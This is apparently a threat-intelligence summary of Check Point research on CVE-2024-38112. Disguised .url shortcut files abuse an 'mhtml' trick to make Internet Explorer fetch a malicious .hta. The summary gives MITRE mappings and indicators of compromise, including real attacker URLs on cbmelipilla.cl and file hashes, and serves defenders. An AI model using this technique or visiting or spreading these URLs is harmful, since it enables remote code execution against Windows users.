Threat actors are leveraging Windows Internet Shortcut files (.url) to force IE to open attacker-controlled URLs, hiding an .hta payload and aiming for remote code execution on Windows 10/11. Check Point Research notes the use of an “mhtml” trick and IE-specific prompts; a Microsoft patch for CVE-2024-38112 mitigates these techniques. #CVE-2024-38112 #InternetShortcut #MHTMLTrick #HTA #InternetExplorer #cbmelipilla.cl #Windows10 #Windows11
Keypoints
- Threat actors use malicious .url shortcut files as an initial attack vector to lure Windows users toward remote code execution.
- The attack relies on an “mhtml” trick to have Internet Explorer (IE) open an attacker-controlled URL instead of a modern browser.
- The .url file appears to point to a PDF, but the real target is a malicious .hta file downloaded via IE.
- IE’s dialog prompts and “Protected Mode” help bypass user suspicion, enabling continued exploitation if the user proceeds.
- The technique could yield remote code execution, especially if an IE zero-day exploit exists, though samples analyzed did not show an IE RCE exploit.
- Microsoft released CVE-2024-38112; users are urged to patch and be wary of .url files from untrusted sources.
- Defense guidance includes proactive protections (e.g., IPS signatures) and vigilance against .url files; Check Point Research continues monitoring.
MITRE Techniques
- [T1204.002] User Execution – Malicious File – The victim double-clicks a .url shortcut, triggering IE to open an attacker-controlled URL; “the victim will get this: IE and a promote window dialog appear when the victim double-clicks on the .url file”
- [T1218.005] Mshta – HTML Application (HTA) Execution – The downloaded file is executed as a malicious .hta; “the ‘opened’ file is actually a malicious .hta file being downloaded and executed.”
- [T1036] Masquerading – File extension/appearance deception – The .url file is presented to look like a PDF link to lure the user; “the malicious .url file appears as a link to a PDF file on Windows 11”
- [T1203] Exploitation for Client Execution – Exploiting client software (IE) to enable code execution – The attacker could gain remote code execution via an IE zero-day exploit; “If the attacker has an IE zero-day exploit … the attacker could attack the victim to gain remote code execution immediately.”
Indicators of Compromise
- [URL] attacker-controlled landing URL – http://cbmelipilla.cl/te/test1.html, https://cbmelipilla.cl/te/Books_A0UJKO.pdf%E2%A0%80%E2%A0%80…hta
- [Domain] cbmelipilla.cl – Domain hosting attacker pages referenced in the .url file
- [File hash] sample .url artifacts (ITW) – bd710ee53ef3ad872f3f0678117050608a8e073c87045a06a86fb4a7f0e4eff0, b16aee58b7dfaf2a612144e2c993e29dcbd59d8c20e0fd0ab75b76dd9170e104, and 6 more hashes